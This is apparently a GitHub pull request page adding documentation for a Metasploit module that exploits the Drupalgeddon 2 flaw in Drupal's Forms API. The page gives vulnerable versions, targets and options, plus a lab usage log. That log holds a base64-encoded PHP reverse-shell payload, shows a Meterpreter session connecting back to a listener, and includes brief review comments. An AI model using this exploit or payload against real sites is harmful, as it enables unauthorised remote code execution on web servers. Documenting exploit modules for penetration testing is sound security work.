-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add Drupal Drupalgeddon 2 #9876
Changes from 15 commits
d8508b8
1900aa2
86ffbc7
3d116d7
7a2cc99
2670d06
62aca93
fcfe927
5be4526
8be58d3
c8b6482
2abfee8
b507391
cd48616
cfaca5b
8ff4407
89c95ca
e03ebf9
8bc1417
2ff0e59
ec43801
b7ac160
910e933
675ed78
b8eb7f2
644889a
File filter
Filter by extension
Conversations
Jump to
Diff view
Diff view
There are no files selected for viewing
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,101 @@ | ||
## Intro | ||
|
||
> This module exploits a Drupal property injection in the Forms API. | ||
> Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are | ||
> vulnerable. | ||
|
||
## Setup | ||
|
||
Use the provided Docker images here: <https://hub.docker.com/_/drupal/>. | ||
|
||
Tested on the 7.57 and 8.4.5 tags (versions). | ||
|
||
## Targets | ||
|
||
``` | ||
Id Name | ||
-- ---- | ||
0 Automatic (PHP In-Memory) | ||
1 Automatic (PHP Dropper) | ||
2 Automatic (Unix In-Memory) | ||
3 Automatic (Linux Dropper) | ||
4 Drupal 7.x (PHP In-Memory) | ||
5 Drupal 7.x (PHP Dropper) | ||
6 Drupal 7.x (Unix In-Memory) | ||
7 Drupal 7.x (Linux Dropper) | ||
8 Drupal 8.x (PHP In-Memory) | ||
9 Drupal 8.x (PHP Dropper) | ||
10 Drupal 8.x (Unix In-Memory) | ||
11 Drupal 8.x (Linux Dropper) | ||
``` | ||
|
||
Automatic targeting means the Drupal version will be detected first. | ||
Targets with a specific version will do as they're told (regardless of | ||
what the server is running). | ||
|
||
Dropper targets write to disk. In-memory targets don't. Be mindful of | ||
showing up in someone's process list, though. A dropper might be more | ||
viable in that regard. | ||
|
||
## Options | ||
|
||
**TARGETURI** | ||
|
||
Set this to the remote path of the vulnerable Drupal install. Defaults | ||
to `/` for the web root. | ||
|
||
**PHP_FUNC** | ||
|
||
Set this to the PHP function you'd like to execute. Defaults to | ||
`passthru`. | ||
|
||
**DUMP_OUTPUT** | ||
|
||
Enable this if you'd like to see HTTP responses, including command | ||
output. Defaults to `false` unless `cmd/unix/generic` is your payload. | ||
|
||
**VERBOSE** | ||
|
||
Enable this to show what function and command were executed. Defaults to | ||
`false` due to the sometimes excessive output. | ||
|
||
**ForceExploit** | ||
|
||
Enable this to force exploitation regardless of the check result. | ||
Defaults to `false`, meaning the check result is respected. | ||
|
||
**WritableDir** | ||
|
||
Set this to a writable directory without `noexec` for binary payloads. | ||
Defaults to the current working directory (usually the webapp root). | ||
|
||
## Usage | ||
|
||
``` | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. can you add a h3 here with the exact drupal version thats being tested? Most likely There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Sure thing! There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. I dropped the header, since it stuck out too proudly. I've written in the tested version instead. Thoughts? |
||
msf5 > use exploit/unix/webapp/drupal_drupalgeddon2 | ||
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 172.17.0.3 | ||
rhost => 172.17.0.3 | ||
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set verbose true | ||
verbose => true | ||
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > check | ||
|
||
[*] Drupal 7.x targeted at http://172.17.0.3/ | ||
[*] Executing with printf(): mGE9am2CAHbvmGg | ||
[+] 172.17.0.3:80 The target is vulnerable. | ||
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > run | ||
|
||
[*] Started reverse TCP handler on 172.17.0.1:4444 | ||
[*] Drupal 7.x targeted at http://172.17.0.3/ | ||
[*] Executing with printf(): HmsPV8tYlEbF | ||
[*] Executing with assert(): eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE3Mi4xNy4wLjEnOyAkcG9ydCA9IDQ0NDQ7IGlmICgoJGYgPSAnc3RyZWFtX3NvY2tldF9jbGllbnQnKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZigidGNwOi8veyRpcH06eyRwb3J0fSIpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnZnNvY2tvcGVuJykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoJGlwLCAkcG9ydCk7ICRzX3R5cGUgPSAnc3RyZWFtJzsgfSBpZiAoISRzICYmICgkZiA9ICdzb2NrZXRfY3JlYXRlJykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoQUZfSU5FVCwgU09DS19TVFJFQU0sIFNPTF9UQ1ApOyAkcmVzID0gQHNvY2tldF9jb25uZWN0KCRzLCAkaXAsICRwb3J0KTsgaWYgKCEkcmVzKSB7IGRpZSgpOyB9ICRzX3R5cGUgPSAnc29ja2V0JzsgfSBpZiAoISRzX3R5cGUpIHsgZGllKCdubyBzb2NrZXQgZnVuY3MnKTsgfSBpZiAoISRzKSB7IGRpZSgnbm8gc29ja2V0Jyk7IH0gc3dpdGNoICgkc190eXBlKSB7IGNhc2UgJ3N0cmVhbSc6ICRsZW4gPSBmcmVhZCgkcywgNCk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkbGVuID0gc29ja2V0X3JlYWQoJHMsIDQpOyBicmVhazsgfSBpZiAoISRsZW4pIHsgZGllKCk7IH0gJGEgPSB1bnBhY2soIk5s.ZW4iLCAkbGVuKTsgJGxlbiA9ICRhWydsZW4nXTsgJGIgPSAnJzsgd2hpbGUgKHN0cmxlbigkYikgPCAkbGVuKSB7IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkYiAuPSBmcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IGNhc2UgJ3NvY2tldCc6ICRiIC49IHNvY2tldF9yZWFkKCRzLCAkbGVuLXN0cmxlbigkYikpOyBicmVhazsgfSB9ICRHTE9CQUxTWydtc2dzb2NrJ10gPSAkczsgJEdMT0JBTFNbJ21zZ3NvY2tfdHlwZSddID0gJHNfdHlwZTsgaWYgKGV4dGVuc2lvbl9sb2FkZWQoJ3N1aG9zaW4nKSAmJiBpbmlfZ2V0KCdzdWhvc2luLmV4ZWN1dG9yLmRpc2FibGVfZXZhbCcpKSB7ICRzdWhvc2luX2J5cGFzcz1jcmVhdGVfZnVuY3Rpb24oJycsICRiKTsgJHN1aG9zaW5fYnlwYXNzKCk7IH0gZWxzZSB7IGV2YWwoJGIpOyB9IGRpZSgpOw)); | ||
[*] Sending stage (37775 bytes) to 172.17.0.3 | ||
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.3:43864) at 2018-04-24 03:55:25 -0500 | ||
|
||
meterpreter > getuid | ||
Server username: www-data (33) | ||
meterpreter > sysinfo | ||
Computer : b3a405d5568a | ||
OS : [redacted] | ||
Meterpreter : php/linux | ||
meterpreter > | ||
``` |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
remove
>
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
That was my smartass quoting the module description. :P